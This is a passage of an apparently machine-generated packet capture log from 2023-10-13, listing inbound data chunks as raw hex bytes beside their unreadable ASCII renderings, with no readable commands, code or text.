a4 10 9a 78 b9 a6 55 74 42 f4 75 8f d6 d9 5a 9f 9e 9c 14 8a c8 27 4a 64 cc 47 54 4b 19 c6 8e f2 6f 96 0c e2 af 18 97 d3 f9 5d d2 dd Data Ascii: .A0s"2XD^s-=X5{~='/q%Yy@5<6E<\|$oB86r`lZ1/1JL6>C<tJ+zi0uE.$Zo0=$$*[b UMJT3fxUtBuZ'JdGTKo]
2023-10-13 13:21:14 UTC	6110	IN	Data Raw: f7 e9 31 c4 d7 44 73 3b 9c 44 a8 43 81 1d bf c0 af 27 a2 a4 3a 64 c3 48 ea a2 43 ba 08 84 20 ff ca 37 63 d9 48 74 6d 08 34 c5 7a 06 2a 79 88 88 40 07 db 42 15 cf 50 da c5 0f 3a c4 9d b8 1f 8f b3 c4 23 70 d4 b2 c8 7c f9 ee 57 bd 1a 14 c9 4f bc 8e 7f ca 35 a6 24 e6 40 5a 32 5c f8 3e 26 f8 f5 c4 df 83 3a 25 16 37 79 ea a1 b1 4b b1 dc 1f e0 c4 c2 af 98 7c e1 7f f0 90 f2 bf 4a e4 9a f4 d3 41 76 45 81 ea 42 67 fe 56 4e 4b 54 da 2e c2 e9 ea c1 44 40 e5 bd 82 59 1d ec ff 01 57 b3 2b 13 4a 4a 06 22 87 0d f9 8a 27 f4 f9 d6 a5 09 1f de 03 10 a2 9d 95 58 14 f1 ba 18 a0 78 4e 78 d1 4d 06 59 c8 49 e9 1e de 0f 46 cd 0e a9 4a 54 06 3b e7 cb 75 36 1b 04 d6 0e e7 b4 5a 0f 2e 89 9b 93 c0 14 98 e8 50 ea 35 a5 81 42 64 8f b8 c0 1a 11 b7 f4 d4 85 34 28 78 d6 36 ea 9b 04 68 c5 Data Ascii: 1Ds;DC':dHC 7cHtm4z*y@BP:#p\|WO5$@Z2\>&:%7yK\|JAvEBgVNKT.D@YW+JJ"'XxNxMYIFJT;u6Z.P5Bd4(x6h
2023-10-13 13:21:14 UTC	6126	IN	Data Raw: 2e a4 39 ac b6 b0 7d 77 8f 2e 5f 9b 60 f4 2f 69 93 a5 5b 41 3f 8e ab cf b9 57 59 55 33 d5 cc c0 9d f5 71 46 da b8 3c 4e b2 5a da 15 95 81 ff 6d ab 64 5d af 85 39 eb d9 b8 6c 79 dc 7a df e7 20 10 6a b0 90 92 81 ea 85 54 fc af 9c dd 33 85 06 f0 fa fc f4 b8 5d 61 2a 7f c9 6d 41 bf ba 1c ab 67 14 2b 50 2f 9f bd af 92 2f dc f5 54 09 bb 22 2f d5 58 bf cc 3e e1 7a 38 c2 86 72 91 26 5c 3c 16 0d 8b d8 07 70 4e 57 12 36 d1 b1 6e fb 00 24 8c c3 b6 07 fd 10 dd d6 19 4e e5 4a ea 83 a8 55 a2 fe 25 a7 e7 cd cc 5f c6 f2 83 11 87 b3 13 c5 d6 09 f1 47 74 c6 29 3f cf 4d e9 97 ad 25 42 e8 61 fa 3c 3f 7f fb ba a4 8f 64 5e 92 a4 7e af c4 49 db ea 36 b0 54 57 36 13 8e d7 6a 2d e4 8d c4 d3 70 25 93 bb 39 58 87 a2 6f aa 11 4f dd fc 63 68 31 a2 0a b6 cc 4a 11 62 ee 10 30 3d e4 92 Data Ascii: .9}w._`/i[A?WYU3qF<NZmd]9lyz jT3]a*mAg+P//T"/X>z8r&\<pNW6n$NJU%_Gt)?M%Ba<?d^~I6TW6j-p%9XoOch1Jb0=
2023-10-13 13:21:14 UTC	6142	IN	Data Raw: 08 c9 20 8a 1b 5e e0 99 4a 37 c2 ca 4a 3a 00 41 08 22 d2 82 1a 97 70 99 97 42 50 b4 4f b1 c0 49 ed 9d 17 c7 cb 84 32 64 3c 8e 2b cd 3d 65 92 fc 53 94 57 c4 66 48 ac 47 3c d7 0c 97 6c 0f dd 85 7f 74 90 2f f0 98 56 d9 07 8d a2 fe 4c 4f ce 31 ae 7f 1c 5b 59 8b 1e 58 9c 8c cc e7 73 ca f8 72 8b 3a 46 02 91 5a 04 db 31 28 a9 46 b6 4d 6a 6e e6 9a 40 ed c6 f8 d2 b9 72 14 80 93 d0 ec f8 56 0b f6 d1 55 fb 65 91 c0 53 20 5a aa b5 2d 35 92 11 f2 8e 72 bb 93 52 60 9e ff be b5 d7 cc cb 50 c3 51 4f 8f f7 ad 63 8c b3 a9 2b a1 51 5c 3e 18 37 ae a9 05 c5 0c bf f6 62 e8 c6 15 b6 0e 75 8a a6 96 8c da 3b 93 39 c4 fd c4 99 1d 7e ab fb 2a f7 0d a9 98 65 fe 86 e0 c2 67 0c c6 52 7e 67 a9 be 6e 98 a2 c4 b0 26 c4 23 17 a4 a2 b0 b2 fb c6 8a 0b ad 63 2a b9 3c 1a d6 1a f0 af 2f 9c 26 Data Ascii: ^J7J:A"pBPOI2d<+=eSWfHG<lt/VLO1[YXsr:FZ1(FMjn@rVUeS Z-5rR`PQOc+Q\>7bu;9~egR~gn&#c</&
2023-10-13 13:21:14 UTC	6158	IN	Data Raw: 9d 55 9a a7 9f 50 d2 de 1e f6 0f 38 49 3c 4a 7d 45 ac c2 de 83 94 6e e6 bd 9d 63 42 c4 48 d0 01 6a f6 f5 eb 69 7f 62 d0 c8 21 01 0f 21 96 68 16 28 dc 78 42 6b 8a f5 8f 4e e7 d2 98 42 4e a3 d3 39 f1 bf fb 2c 8e 4b c6 67 0d 49 c0 e4 5d 57 7f 1d 3c 01 82 2f 15 9d 4f ba 88 42 e2 af d5 be 3a ce ed 4a a3 a8 46 ca b3 6b 4e 47 76 5c d3 18 2f 01 f0 88 aa 77 a3 3c 62 a1 3d fc 1f d1 da 9a b6 1c 57 f4 ec bd fd e3 49 f2 d7 0f c1 81 cb f4 c3 19 5d f6 7d 9f 42 6c 50 51 0a a5 f0 e4 c1 49 62 79 96 30 7d e3 36 f4 ba 08 c8 3f 54 45 00 49 41 88 39 2c 46 a0 fc 03 f5 64 7c bf a7 92 d4 fb e0 b2 4b 65 84 29 24 df 6c e1 87 68 6a 93 b2 be af e4 44 d9 54 a3 a8 f2 b0 55 7b 9f 9b e0 a1 1c 53 b1 d0 c3 5b bd 14 83 f9 ad d0 63 98 80 a1 13 6e b1 59 40 29 9b 74 2d 2b a6 a5 1b 91 f2 16 74 Data Ascii: UP8I<J}EncBHjib!!h(xBkNBN9,KgI]W</OB:JFkNGv\/w<b=WI]}BlPQIby0}6?TEIA9,Fd\|Ke)$lhjDTU{S[cnY@)t-+t
2023-10-13 13:21:14 UTC	6174	IN	Data Raw: 62 30 06 1e d9 d3 db 17 e7 85 ea ba ec de 80 79 da d2 45 c5 7c b8 21 fb 57 b7 aa ee 73 8f 86 35 4d 5f f3 f2 b7 ca d9 c2 ea 85 72 75 60 0e 1d 5d 2c 3e c9 77 2f 6a 64 7d b3 fc 5f 79 5b 84 59 29 53 e6 cd 14 e9 c5 a2 6f f4 63 0d a1 14 34 c3 29 0f 82 be 02 aa 33 e5 36 9c d2 39 f2 75 8f ec f6 3e 26 75 77 76 74 f0 ec f0 17 ae 62 73 3d f4 51 63 58 50 1e 7f ec 32 19 8b 2a e7 9b ac 8d a7 9f bf c2 bc fb b4 99 23 f3 17 16 81 f2 6a 48 dc 89 71 30 e0 c2 92 17 dd 72 e7 4c b9 11 55 08 62 45 58 9f 86 a2 9e 03 e6 c3 d4 7b 76 92 42 77 1c a2 81 11 fd f9 c3 6a 1c 7c 86 66 5d 3e 83 27 df 84 2e d1 5d ca 27 61 eb e9 5d 71 01 9d a6 b9 cf 0a c5 3e 2a a5 a4 ef 5b c7 84 5c 2c 74 bb a2 74 2a 4b fd 0b cf ec 9c a5 b1 41 59 77 b7 36 e2 ce 68 f3 2d 34 53 e2 b2 10 56 8a 3e 1a 52 e3 bf 24 Data Ascii: b0yE\|!Ws5M_ru`],>w/jd}_y[Y)Soc4)369u>&uwvtbs=QcXP2#jHq0rLUbEX{vBwj\|f]>'.]'a]q>[\,tt*KAYw6h-4SV>R$
2023-10-13 13:21:14 UTC	6190	IN	Data Raw: 34 c2 e9 ef 9e 82 be 08 ba 30 38 0f 42 19 67 58 33 12 ff d5 7f 10 38 72 33 be 15 26 af 73 38 71 db 4b ad 3c de 5f d0 bc 91 18 8d 26 eb 4b 03 8c cb e8 bd fb 76 a5 75 1c 0a 48 b1 de 1b 00 5d 90 bf cc cf b4 40 5d b7 0a 4a be 8c 26 d0 a6 e7 a2 44 a2 af 9f af 77 2f e3 16 94 35 1b 43 2c d8 30 dc 85 50 03 6a e0 25 0d 9f d8 e5 2a 8a 01 91 00 9a 0a 58 90 e6 7a 3b 88 ef bd 84 07 bf 5d c6 64 b2 d5 0f fd c2 a9 db 1b 4b 81 56 69 14 39 fc 34 72 72 83 57 a3 d6 b5 49 41 5c 75 39 65 bf ea 29 64 dc a1 4d 12 b2 07 41 6d 20 aa dc 2f 04 9c 8e c1 82 98 40 2a 81 e8 c8 01 35 8a 85 71 87 a1 2c 03 7e fc 86 5c 77 bd 1e 19 64 20 d7 90 50 c3 34 fd 6a 71 ca e3 df 48 6c 5b 85 e2 11 f5 82 87 3d 2c b3 72 b8 59 65 96 2e 57 30 8a 70 b4 fb 6f 7a dd 20 f8 03 b7 b3 ad b3 5b 01 d1 d4 02 f9 77 Data Ascii: 408BgX38r3&s8qK<_&KvuH]@]J&Dw/5C,0Pj%Xz;]dKVi94rrWIA\u9e)dMAm /@5q,~\wd P4jqHl[=,rYe.W0poz [w
2023-10-13 13:21:14 UTC	6206	IN	Data Raw: ab 12 47 df 15 00 f7 9a 97 39 fd bf f5 12 7e ca 30 c9 ca 9f 9a b0 d5 b4 36 03 af d5 b3 01 5e 14 55 1d 84 c4 85 f4 d4 5c 4d e8 8a ac 82 35 ba 2f 0d 6a 62 92 be 07 4b a5 85 42 f6 ef dc 7e b9 88 cb c6 6e dd 42 70 5a 9a 5c 44 79 58 25 1d 39 86 08 61 25 32 ed b9 0f bd 42 63 a2 21 04 75 77 1a 59 c7 17 ac 8c d8 5a 93 ff 29 61 d7 ca 28 b9 d9 51 4d 2d 79 cb 65 5b bc 9b e0 a4 51 95 99 5c 2a 68 35 8a 7d 97 2f 57 c2 14 4e 41 fa 7a 7f 48 a9 87 96 2b 3a 42 dd 9d 89 43 22 11 58 fc 5e 19 0b 62 f0 71 cf a8 f6 8a 1b 26 aa c9 ba 96 6a 55 4b 36 3c eb ed aa aa 36 c9 58 fc 62 f4 fe 4f 40 a4 66 88 aa a1 13 86 c3 04 14 23 58 21 ff 02 e9 79 27 69 51 83 cc 65 3d 29 89 28 f1 30 45 e2 3e 98 31 56 ed fd cd 1a fd 68 5e f0 5d c1 af 67 89 be e5 20 13 96 11 60 39 4b 32 6e d0 43 0f b7 9e Data Ascii: G9~06^U\M5/jbKB~nBpZ\DyX%9a%2Bc!uwYZ)a(QM-ye[Q\*h5}/WNAzH+:BC"X^bq&jUK6<6XbO@f#X!y'iQe=)(0E>1Vh^]g `9K2nC
2023-10-13 13:21:14 UTC	6222	IN	Data Raw: 8d 18 29 9b 7d db 0a 1f 41 a3 92 38 11 b5 07 7b df fe c0 dc f1 1e 0a 66 5b 78 c4 fb ed 94 a5 0a 6c 3d d7 a9 ba 32 cc a8 46 9f e2 03 45 5e 66 74 bb 2e c4 55 89 23 a5 41 7d 9d d3 d7 58 77 3d 4f 08 46 8d d8 f2 4e ad ce e6 f2 c7 24 78 10 bb e3 46 ef 7f cc 01 db a0 89 6e 93 75 2b 2c 55 60 fb a0 d6 c0 25 4b 40 9c 1f e7 92 30 03 7e fb fb 0c 85 84 16 2e e3 b3 81 85 5c 46 5f 91 e1 85 de 6d 0d 9e aa 7d 0b 51 c3 4b 91 f7 cc 1d 08 6c 48 8a fd d1 5d e8 38 94 09 46 41 be 9d 90 a0 00 ad e9 9f c7 19 b1 8e 21 9c df f5 8e b3 11 f1 1c b9 b0 91 90 3e f5 43 dc 72 ee 35 0d 6d b8 5a dc 73 73 21 25 50 02 72 96 fc b4 52 fa c1 09 0b 9e b2 c3 0d 76 7b fa c8 03 58 79 a7 ad 64 2b 3b c3 f7 5e f5 e4 57 66 1b a1 d3 e2 b4 6d aa 49 3e d7 75 e0 6f be 9b b1 5b 1c 92 44 47 7d ae 01 13 14 3e Data Ascii: )}A8{f[xl=2FE^ft.U#A}Xw=OFN$xFnu+,U`%K@0~.\F_m}QKlH]8FA!>Cr5mZss!%PrRv{Xyd+;^WfmI>uo[DG}>
2023-10-13 13:21:14 UTC	6238	IN	Data Raw: db 30 0a ea 72 19 de 19 7b eb 73 f6 1d d8 67 1c e4 ae a5 3e 80 d8 88 43 b8 71 d6 77 a7 d3 22 fe a3 91 60 28 6d 1e 29 9c 7f 61 ac 59 4d c0 50 d3 dc 26 42 ca f0 ca 35 2b e9 6d d1 bd 8c bc ca 85 04 3b c0 49 fb c9 8b 63 21 74 32 27 6e 17 a3 a1 17 ee 4f 42 1c c4 51 28 3d e4 ec 5b 82 30 b0 8d 1f 31 5c 0f a6 96 a1 77 a4 c4 1d 62 a9 30 a4 f8 f6 0a 43 47 21 4c 7e 82 4e f2 21 15 20 34 a3 c6 ac 66 6d 54 c6 ec 56 5e 44 0a d8 09 08 ff db b3 1a 4a 51 4f a4 ab 06 0d 6c ba 44 36 8f d4 ff 07 5f 74 75 b5 e8 2b 0b b6 f0 40 79 a1 02 43 89 96 91 e6 d6 4c 00 d2 36 b3 d4 ef 9c 71 9d fc b3 ff 36 15 85 9f 00 8d bb cd db 2d 76 02 43 5c 7e 43 84 7f 0b a7 51 a8 02 21 1f 66 7c a9 b9 04 a2 41 b8 4b 0e 67 e2 8d 9e f9 05 f4 25 a1 18 64 c1 7b 19 cb 75 a0 7d b3 02 6e be 73 53 98 ed 88 86 Data Ascii: 0r{sg>Cqw"`(m)aYMP&B5+m;Ic!t2'nOBQ(=[01\wb0CG!L~N! 4fmTV^DJQOlD6_tu+@yCL6q6-vC\~CQ!f\|AKg%d{u}nsS
2023-10-13 13:21:14 UTC	6254	IN	Data Raw: c7 3a 70 7f 9e 05 19 74 3d f2 3b a0 56 4d 89 7d 9a 98 c1 94 09 b2 92 71 a1 50 38 8c dd 66 c1 a7 78 27 82 db f7 c6 4e 46 47 7d 19 bd ee ee f8 d2 8f 35 59 64 cc 0d 37 56 68 b2 4f 63 d7 d1 43 52 2a 89 92 8a 7e 62 12 ae 9d 9b 2f 89 3b 5e 47 25 47 1d 63 8e 61 7b 1f 97 b4 03 2d 42 93 01 cd 9e 51 3b 95 be bc 6d 04 84 78 37 dc 42 5c f7 b9 d7 f1 64 04 41 35 90 94 f1 42 5a 81 27 7a f9 9f a0 68 85 c7 c3 68 76 a3 6c 6b 87 3e 9c b0 33 3b 87 d9 b3 54 d8 4f 57 36 3e 47 72 a2 d9 c1 4a e0 83 98 a2 49 e2 b6 a6 7c 12 4e 9b d8 eb 11 41 6f 80 ed 74 08 af 63 db c2 f9 a2 37 a0 06 f4 45 41 1d de 44 cf 9b 37 1a 7a 41 c7 36 2c b2 0c d8 d6 21 55 a1 41 bd 72 10 1b 85 b7 af 3e 51 75 c6 2c 2a ee 93 27 43 02 45 f2 43 88 47 ed d8 d9 0f d0 9b 11 e7 1c c6 ac 2e e0 12 e7 02 7a d6 70 eb 66 Data Ascii: :pt=;VM}qP8fx'NFG}5Yd7VhOcCR~b/;^G%Gca{-BQ;mx7B\dA5BZ'zhhvlk>3;TOW6>GrJI\|NAotc7EAD7zA6,!UAr>Qu,'CECG.zpf
2023-10-13 13:21:14 UTC	6270	IN	Data Raw: be d1 f1 86 20 8a 6c a4 ee 2e 00 06 4e 73 91 7c c8 35 1f 5f 6f a7 48 6b 5b 78 94 4e fc 32 9c 89 c4 76 ec 04 1f 02 1f ab 00 93 29 90 f6 4b a8 50 2e 12 bf ee 51 e4 f6 2f 0c 17 53 f3 df 9d b3 67 5b 8c 7d 3d 11 e4 06 e2 e8 14 61 a4 de 8f 2d 8e fe 29 02 87 c8 f2 c3 77 54 7b 4e 52 65 83 f0 f2 df 98 35 54 9f 2f b6 cd 1d 2e c8 2e 5b b8 8f bd 30 fd 20 4c 27 d5 6a a3 7e ed 3a 0f 54 c8 0c 34 ac 45 6f d5 08 60 ee 39 f5 3c 47 93 9b 17 6b 8a f9 68 f5 75 2f 3a 19 2a 85 49 ea 2f 5c f1 22 ab 18 cd 49 90 15 15 5f d9 47 d0 0d 46 0c 3e ca 28 f6 42 8b 9f c2 30 13 fe dd 2a cb ec 57 36 0a 22 e5 90 48 97 cf cd 39 55 66 6d 88 1e cd 30 69 6a 02 7d 7c 0d 9b 49 6a 02 18 80 8b 76 c1 af 85 e8 82 9e 52 8e e8 50 76 2f 11 b6 bc 07 45 1c 81 3a 22 a5 38 73 a6 05 ce 99 4e 87 38 05 cd df 8c Data Ascii: l.Ns\|5_oHk[xN2v)KP.Q/Sg[}=a-)wT{NRe5T/..[0 L'j~:T4Eo`9<Gkhu/:I/\"I_GF>(B0W6"H9Ufm0ij}\|IjvRPv/E:"8sN8
2023-10-13 13:21:14 UTC	6286	IN	Data Raw: a3 81 82 22 22 a5 b2 f7 06 c1 32 2f 92 9e 7b d9 eb 63 5f 7d 98 f9 44 78 22 8f 1d ec 6a 29 f1 9b a7 66 65 03 53 83 5f 61 11 67 61 0e 9d 42 20 ff c9 da 45 89 69 9c 55 87 3a 32 fa 27 a9 13 40 03 dc 95 52 35 60 c8 90 dd 33 c4 6f 1f 92 4d b7 7f 6d 90 aa c9 ec df 09 c6 0d d9 18 af 64 94 12 ab 35 19 5e 35 88 10 aa f9 49 f5 b7 c4 ce 53 94 a4 6e 64 5b d6 b2 5f 0b 87 78 3e 35 46 4b d7 5e a4 74 66 ac 82 fa 40 1d c9 85 36 61 72 74 f4 9e bc f5 2a 03 98 10 d6 7b 99 fc 07 e4 8a 01 20 f0 a0 c4 80 33 69 01 61 58 5b 52 b6 1f 4d 04 6f 2a 3c 58 5d b4 78 0c 52 30 f4 24 27 a0 70 85 bf 12 4a 3d 6c 08 4b c0 c4 d2 0c bd 99 0d 36 a9 e7 5f 04 90 76 aa bb 57 5d e2 11 9b 35 41 b7 63 53 5d 69 e0 41 8a 62 36 1e d3 b9 a2 d1 7f 7c a2 56 4b 26 74 74 a2 fd bc fc 71 c2 5e f5 cc c4 69 d4 b4 Data Ascii: ""2/{c_}Dx"j)feS_agaB EiU:2'@R5`3oMmd5^5ISnd[_x>5FK^tf@6art{ 3iaX[RMo<X]xR0$'pJ=lK6_vW]5AcS]iAb6\|VK&ttq^i
2023-10-13 13:21:14 UTC	6302	IN	Data Raw: b3 28 f2 a2 29 77 8a 2b 80 4b eb 48 e4 57 39 64 f5 17 4f c6 32 42 c8 4f 61 53 f3 1b 94 f9 ad 28 8f fb 61 b7 53 bc 04 89 19 7e a0 5f 17 12 2c d0 ac c0 8c c6 12 32 66 4f ed 5d a5 10 23 b7 81 53 0b 0f 18 99 8a 23 b9 2a 08 9e d3 b1 5b 8c 2a 12 94 30 81 05 2f ff 6b 06 93 6b e4 3b 2b d9 d6 c3 e9 84 46 08 02 b4 00 2c 01 0e 7e d3 76 00 27 80 64 f9 99 f9 ca b2 6f 57 84 db 1d 65 e6 51 7b e1 78 ff a9 7e a3 b2 89 41 0d ba e7 8a 36 d6 07 b4 33 33 71 46 6c 48 4d 45 fc 4b 49 aa 60 d3 30 12 06 6a 99 fb cd da 66 76 38 57 2e 60 6d ff 7a 4c f1 25 f0 c7 a5 16 cc 8d ec 53 74 76 7b bb 05 97 11 72 30 af 33 0e d7 df b6 6d 58 63 63 f7 6c 38 a7 25 21 34 c2 37 8a 55 61 51 6b 85 c8 09 a0 27 25 d8 04 d7 05 53 20 5e c5 c8 73 d1 96 3e 53 8a 50 21 29 a4 66 db dc 93 60 31 3a fa 5d 2e 33 Data Ascii: ()w+KHW9dO2BOaS(aS~_,2fO]#S#[0/kk;+F,~v'doWeQ{x~A633qFlHMEKI`0jfv8W.`mzL%Stv{r03mXccl8%!47UaQk'%S ^s>SP!)f`1:].3
2023-10-13 13:21:14 UTC	6318	IN	Data Raw: f1 93 b4 6d d4 14 d9 01 6b 1b 10 84 1b f4 64 b3 33 77 d9 14 5f a3 3d 18 a0 2d d1 93 86 c0 d7 0b e4 ec 35 b2 37 d9 11 ad 5e 73 dd 2f 93 b1 30 5b 68 fc 2e a6 68 fb 4d 40 ba 90 02 e9 b0 23 4d cf ed be fe 18 7d 2a 40 28 cb fa 09 47 dd 91 26 86 f9 0f 57 4d e0 b5 58 08 67 7f ca 14 e8 ae 6c 82 a1 df ee 51 c7 12 fa c3 a9 91 a4 9b 35 da 73 e1 b5 32 2a c1 73 ca 4f 7e e0 e1 56 24 61 d3 ad 92 06 b6 f7 ca fb df 8f e3 80 1c 5a 78 15 b9 11 f4 06 94 d8 78 30 89 af 8b 78 4e b2 63 ad 59 c8 eb 88 e5 af 89 b2 ea c1 ba f3 88 35 0c 18 25 d7 fd 83 7a ef de fc 4b 8b 04 0e 07 a8 09 35 c3 90 51 fd e2 a7 f6 74 52 22 a5 6a e8 f1 ed d0 de 89 02 49 59 0e a6 e6 99 6a 3c e2 c0 89 fc ed 94 1e fc 58 16 a5 3f fa 22 2c 2d 24 23 f6 2e 6a dc 6a 1b 70 c5 6c 42 3c e2 33 fe dc e7 53 2f ef d2 18 Data Ascii: mkd3w_=-57^s/0[h.hM@#M}@(G&WMXglQ5s2sO~V$aZxx0xNcY5%zK5QtR"jIYj<X?",-$#.jjplB<3S/
2023-10-13 13:21:14 UTC	6334	IN	Data Raw: 6f 58 fd d5 e3 6a dd 51 52 b6 58 2c 64 e8 97 5a 28 42 0d 15 10 0f 71 30 d6 e3 55 95 86 35 7d 9d 58 d7 4a a3 84 ff fd d0 60 b3 04 51 ca 67 ed 97 f1 ad a0 e3 35 d0 41 a0 b9 6d 1e 3f 12 96 a3 e5 fc cd 93 9d c5 b7 2b 6d fd 20 6b 57 ef af 7f 38 aa e0 cb 9b 24 fd eb a3 31 72 4a 19 0b a9 74 53 0f 15 06 d0 b3 37 af 80 c7 f8 8d af 0c 80 7c cf 6e e3 a7 45 d7 93 30 7f aa 4d 05 71 f5 ea 41 98 03 6e eb f9 5d 30 1a 8f 0b 5d ef 5b 56 e2 2b be e8 a4 09 4b 34 3c 6a 46 a7 80 41 96 d6 71 34 99 d6 47 b0 7c 41 08 7c 6a 82 80 8b 43 6b bb e4 56 fb f8 53 9e 85 71 1a d6 73 e4 ed 11 e0 b3 91 bf 29 28 80 4b 43 e4 0c 6b 06 80 2b f0 63 9c b3 5d e8 e8 c5 a2 24 64 7d e3 3f 2c 48 6d fc d1 37 02 19 60 3b ab f3 57 ec 7f 71 4d 8a 74 d4 4a 26 95 d2 41 c2 a5 d6 7d 80 fb 41 b8 5f 7e c9 fb af Data Ascii: oXjQRX,dZ(Bq0U5}XJ`Qg5Am?+m kW8$1rJtS7\|nE0MqAn]0][V+K4<jFAq4G\|A\|jCkVSqs)(KCk+c]$d}?,Hm7`;WqMtJ&A}A_~
2023-10-13 13:21:14 UTC	6350	IN	Data Raw: 68 20 ae 04 47 e0 07 b7 ec fd 88 89 08 f7 e7 04 a4 84 b7 6e 68 d7 e4 62 82 3d 19 c4 f7 87 4d fa 9c 76 22 d3 18 41 0f b6 08 35 d1 06 a7 05 52 f0 3d 92 d6 fa 43 23 83 48 b9 ca 2b d0 4e e7 44 22 4c 28 d7 24 97 f8 b6 51 be f5 93 e0 af a4 44 95 35 1d be 6f 0e 42 85 23 8c 8e cf 65 90 0b 46 33 47 95 14 9d 77 db 29 b0 9a f4 fa 61 36 f8 97 00 0c 2e f8 4f 44 83 3d 81 b6 36 88 62 64 4f 20 02 0b 81 6b b8 9f ec 29 12 df ea 86 22 e0 49 54 9a 44 d8 e2 df de 63 30 c0 0a b9 6a 84 00 6a cf 82 22 85 43 08 2a fd 36 ff 24 79 0a 3b e0 1e 89 f0 7f 52 e2 d5 e7 1e 07 be a1 9b b4 74 ae 6f a4 95 34 ac 03 88 c4 46 b9 7c 74 d0 c1 21 6d 3b 70 5f 25 71 55 8e 73 1a be f4 3a 76 85 0e 6e 6c 01 52 aa f8 1f cd 4f b1 3b 6a f4 98 40 98 50 45 fc 06 db 43 ba 28 e0 8a ee 0d 0e a5 4f 5d 88 32 44 Data Ascii: h Gnhb=Mv"A5R=C#H+ND"L($QD5oB#eF3Gw)a6.OD=6bdO k)"ITDc0jj"C*6$y;Rto4F\|t!m;p_%qUs:vnlRO;j@PEC(O]2D
2023-10-13 13:21:14 UTC	6366	IN	Data Raw: f4 1f e7 2e 87 8f 41 45 06 52 63 5f 54 e2 0e 50 1f 74 59 a4 dd e4 e0 23 ff 38 ab f1 57 bc 19 af 8f 9a ca 34 dc ff de b4 6f 90 7f 67 4d 70 79 f0 ab 8d eb a3 34 0e c5 ad 63 25 34 b7 a9 64 0e 07 9f 87 7d fd 8a b3 dc b9 fd 76 80 e0 02 f6 e4 76 ab 93 f6 70 61 28 7e ef ba c9 93 60 ca bb 15 97 24 b0 18 5a 0a fb f3 0c d1 10 42 88 9b 40 52 b4 0a 27 60 5f b6 ba 29 c5 17 0c ea 5e f4 0a 45 86 7a 12 42 8a 48 4d 53 85 e7 91 ce 73 42 14 b4 af b6 16 5c 20 66 c7 52 47 0d 3c b4 92 ee c1 6b 90 3d 8c dc e8 ae c7 ea fa ca b8 47 21 7a 43 4e a0 ef 40 39 1b 4c 43 d7 d8 e3 81 e5 91 24 2c 2e 07 a6 8c 27 ec a1 ef c8 42 76 72 92 f9 fd dd 2b cd 9f a0 01 36 ef c1 36 3b 60 a5 c4 a0 30 d3 96 93 79 49 6f 98 37 86 34 6a 04 98 d7 a9 d2 a7 2f b6 b0 f7 59 cb ee 2a 78 a0 d7 e2 8b cd 0d e0 f0 Data Ascii: .AERc_TPtY#8W4ogMpy4c%4d}vvpa(~`$ZB@R'`_)^EzBHMSsB\ fRG<k=G!zCN@9LC$,.'Bvr+66;`0yIo74j/Y*x
2023-10-13 13:21:14 UTC	6382	IN	Data Raw: ab 26 ed 3c b3 b9 2d 65 00 58 ad 2f fb 7d 13 03 00 bb 59 4c 92 71 51 3d 75 57 ac 25 21 0a b1 62 51 62 3d e2 f2 cb a7 1c 90 60 7e 04 3e 60 b1 ec a3 6c 48 1e 5b 20 62 e0 24 64 03 18 8e 91 32 f0 8b e1 ca 1d ba 23 4b 75 87 c2 a9 1a 90 5c 94 e8 74 76 58 70 c8 b9 b0 c5 eb 4f 2f f4 c2 31 68 a7 40 3d 05 b0 01 df b8 e2 08 76 37 e6 05 ee 89 dc aa 6d 43 ca 22 be 8e 5f 5e 11 8f 3d c8 d1 40 52 17 26 3e 13 70 29 8a 1b c4 7d 2d d6 90 26 98 d7 57 5f 1c 6a d1 45 8b 50 e3 46 a6 f5 e5 2c 26 62 e2 19 3a f4 b8 be 62 28 c8 f3 ff 8b 80 86 5c c1 22 f3 39 f4 cf f8 c6 97 27 8a d8 eb 3b ae ab 13 a0 b6 01 e1 26 71 b1 53 d9 ae 32 14 b0 a0 29 6b f5 c4 b2 97 7e f5 d6 2c 3f e8 fb d5 f8 a0 06 95 a7 e3 96 7e 09 36 58 cb 74 da 0d d2 2b ed 51 c6 e9 8a 88 51 bf 08 7b ca e8 65 e8 1e 09 b5 5e Data Ascii: &<-eX/}YLqQ=uW%!bQb=`~>`lH[ b$d2#Ku\tvXpO/1h@=v7mC"_^=@R&>p)}-&W_jEPF,&b:b(\"9';&qS2)k~,?~6Xt+QQ{e^
2023-10-13 13:21:14 UTC	6398	IN	Data Raw: df 8a d9 98 be e6 fe ec 31 5e cb 3c fe 60 18 31 a3 c3 1c df 39 52 3e 59 fe 24 39 46 32 a2 57 a3 57 ea f0 3c 2f 84 ec 1b a4 d8 0a 28 1c 8a 72 4a ce 3d 6c fc e8 fe 3f 96 fa 49 0b 7b d9 80 f0 92 4e 5a c5 c1 79 2e 11 cc 6d d1 f4 50 45 d4 f7 c3 27 bc 4c 70 50 99 d1 1d e0 56 bc ef db 66 73 5e 8b 75 f1 37 49 69 c2 41 58 7b e4 59 f2 ab 02 dc d9 b4 46 1d 1e b3 c0 51 01 65 bf 81 ba 2c 4d 8d e9 27 3e 29 cd 4b 9b 1c 22 56 2f b6 ae e3 99 f1 1e b7 7c 0d 96 4d 6f eb 27 47 a6 b3 40 ed b9 09 4d 19 eb a2 bf 4d 59 da 9f 74 6d bb e8 34 48 f6 ef 77 b1 34 22 66 59 ce 2c 30 8e be 64 f0 2f 44 e5 00 ba 0a a7 2b e2 2e d2 14 88 12 88 66 00 8c 0d ad 4f 35 86 d9 ad f0 be 41 b6 04 a7 bb ea e2 b3 fd 5f 88 a1 35 3a 7a e8 74 3f f4 96 fd 9a 5d ec 61 3c 85 47 8b a5 72 58 b0 c1 1f 63 49 6a Data Ascii: 1^<`19R>Y$9F2WW</(rJ=l?I{NZy.mPE'LpPVfs^u7IiAX{YFQe,M'>)K"V/\|Mo'G@MMYtm4Hw4"fY,0d/D+.fO5A_5:zt?]a<GrXcIj
